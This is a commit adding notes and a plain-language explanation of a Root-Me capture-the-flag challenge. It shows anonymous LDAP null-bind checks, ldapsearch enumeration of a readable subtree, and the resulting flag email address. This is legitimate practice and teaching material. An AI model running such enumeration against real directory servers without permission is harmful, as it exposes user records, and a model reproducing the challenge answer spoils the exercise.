feat ldap-null-bind
Signed-off-by: Tuan-Dat Tran <tuan-dat.tran@dextradata.com>
This commit is contained in:
Tuan-Dat Tran
81
network/lda-null-bind/explaination.org
Normal file
81
network/lda-null-bind/explaination.org
Normal file
@@ -0,0 +1,81 @@
|
|||||||
|
* LDAP null-bind challenge explained simply
|
||||||
|
|
||||||
|
Think of LDAP like a big company phonebook/tree.
|
||||||
|
|
||||||
|
Each node in the tree is a folder or a person record:
|
||||||
|
|
||||||
|
#+begin_example
|
||||||
|
dc=challenge01,dc=root-me,dc=org
|
||||||
|
|
|
||||||
|
+-- ou=anonymous
|
||||||
|
|
|
||||||
|
+-- uid=sabu
|
||||||
|
+-- mail: sabu@anonops.org
|
||||||
|
#+end_example
|
||||||
|
|
||||||
|
In this challenge, the server allows *anonymous login* (called a null bind).
|
||||||
|
That means we can connect without a username/password and ask some questions.
|
||||||
|
|
||||||
|
** What we did (step by step)
|
||||||
|
|
||||||
|
1) Checked if anonymous access works
|
||||||
|
|
||||||
|
#+begin_src bash
|
||||||
|
ldapwhoami -x -H ldap://challenge01.root-me.org:54013
|
||||||
|
#+end_src
|
||||||
|
|
||||||
|
It returned `anonymous`, so null bind is enabled.
|
||||||
|
|
||||||
|
2) Tried to list everything from the main base DN
|
||||||
|
|
||||||
|
#+begin_src bash
|
||||||
|
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "dc=challenge01,dc=root-me,dc=org" "(objectClass=*)"
|
||||||
|
#+end_src
|
||||||
|
|
||||||
|
Server replied with `Insufficient access`.
|
||||||
|
|
||||||
|
So: anonymous is allowed, but not everywhere.
|
||||||
|
|
||||||
|
3) Probed likely child branches under the base DN
|
||||||
|
|
||||||
|
We tested candidate DNs and found one readable branch:
|
||||||
|
|
||||||
|
#+begin_src bash
|
||||||
|
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "ou=anonymous,dc=challenge01,dc=root-me,dc=org" -s base "(objectClass=*)" dn
|
||||||
|
#+end_src
|
||||||
|
|
||||||
|
That confirmed `ou=anonymous` exists and is accessible.
|
||||||
|
|
||||||
|
4) Enumerated that readable branch
|
||||||
|
|
||||||
|
#+begin_src bash
|
||||||
|
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "ou=anonymous,dc=challenge01,dc=root-me,dc=org" "(objectClass=*)"
|
||||||
|
#+end_src
|
||||||
|
|
||||||
|
This returned a user record:
|
||||||
|
|
||||||
|
- `uid=sabu`
|
||||||
|
- `mail: sabu@anonops.org`
|
||||||
|
|
||||||
|
So the requested email is:
|
||||||
|
|
||||||
|
*sabu@anonops.org*
|
||||||
|
|
||||||
|
** Why this works
|
||||||
|
|
||||||
|
- LDAP permissions are often set per branch (subtree).
|
||||||
|
- Root/base queries may be blocked.
|
||||||
|
- A specific subtree can still be world-readable.
|
||||||
|
- Enumeration is about finding *where* read access is allowed.
|
||||||
|
|
||||||
|
** Tiny mental model
|
||||||
|
|
||||||
|
#+begin_example
|
||||||
|
[Connect anonymously] --> [Test base DN] --blocked--> [Try child branches]
|
||||||
|
|
|
||||||
|
v
|
||||||
|
[Find readable subtree]
|
||||||
|
|
|
||||||
|
v
|
||||||
|
[Dump entries + get mail]
|
||||||
|
#+end_example
|
||||||
61
network/lda-null-bind/notes.org
Normal file
61
network/lda-null-bind/notes.org
Normal file
@@ -0,0 +1,61 @@
|
|||||||
|
* LDAP - null bind
|
||||||
|
** Notes
|
||||||
|
- https://repository.root-me.org/RFC/EN%20-%20rfc4512.txt
|
||||||
|
- https://stackoverflow.com/questions/18756688/what-are-cn-ou-dc-in-an-ldap-search
|
||||||
|
** Task
|
||||||
|
Aufgabe
|
||||||
|
|
||||||
|
Es scheint, dass einer der Anonymen einen neuen Zweig im LDAP-Verzeichnis erstellt hat, irgendwo in :
|
||||||
|
dc=challenge01,dc=root-me,dc=org
|
||||||
|
|
||||||
|
Verschaffen Sie sich Zugang zu seinen Daten und erhalten Sie seine E-Mail-Adresse.
|
||||||
|
Zugangsdaten für die Übung
|
||||||
|
Host challenge01.root-me.org
|
||||||
|
Protokoll TCP
|
||||||
|
Port 54013
|
||||||
|
|
||||||
|
** Findings
|
||||||
|
- Challenge type: LDAP anonymous/null bind enumeration.
|
||||||
|
- Base DN: dc=challenge01,dc=root-me,dc=org
|
||||||
|
- Target: find the branch created by an anonymous user and extract their email address.
|
||||||
|
|
||||||
|
** Useful tools
|
||||||
|
- ldapsearch (required)
|
||||||
|
- ldapwhoami (quick null-bind check)
|
||||||
|
- openssl s_client (optional, for TLS troubleshooting)
|
||||||
|
|
||||||
|
** Recon commands
|
||||||
|
#+begin_src bash
|
||||||
|
ldapwhoami -x -H ldap://challenge01.root-me.org:54013
|
||||||
|
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "dc=challenge01,dc=root-me,dc=org" "(objectClass=*)"
|
||||||
|
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "dc=challenge01,dc=root-me,dc=org" "(mail=*)"
|
||||||
|
#+end_src
|
||||||
|
|
||||||
|
** Execution log
|
||||||
|
- Verified anonymous bind:
|
||||||
|
#+begin_src bash
|
||||||
|
ldapwhoami -x -H ldap://challenge01.root-me.org:54013
|
||||||
|
# anonymous
|
||||||
|
#+end_src
|
||||||
|
|
||||||
|
- Direct subtree query on base DN is blocked:
|
||||||
|
#+begin_src bash
|
||||||
|
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "dc=challenge01,dc=root-me,dc=org" "(objectClass=*)"
|
||||||
|
# result: 50 Insufficient access
|
||||||
|
#+end_src
|
||||||
|
|
||||||
|
- Enumerated likely child DNs and found readable branch:
|
||||||
|
#+begin_src bash
|
||||||
|
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "ou=anonymous,dc=challenge01,dc=root-me,dc=org" -s base "(objectClass=*)" dn
|
||||||
|
# dn: ou=anonymous,dc=challenge01,dc=root-me,dc=org
|
||||||
|
#+end_src
|
||||||
|
|
||||||
|
- Dumped subtree under readable branch:
|
||||||
|
#+begin_src bash
|
||||||
|
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "ou=anonymous,dc=challenge01,dc=root-me,dc=org" "(objectClass=*)"
|
||||||
|
# dn: uid=sabu,ou=anonymous,dc=challenge01,dc=root-me,dc=org
|
||||||
|
# mail: sabu@anonops.org
|
||||||
|
#+end_src
|
||||||
|
|
||||||
|
** Flag / answer
|
||||||
|
- Email address: sabu@anonops.org
|
||||||
Reference in New Issue
Block a user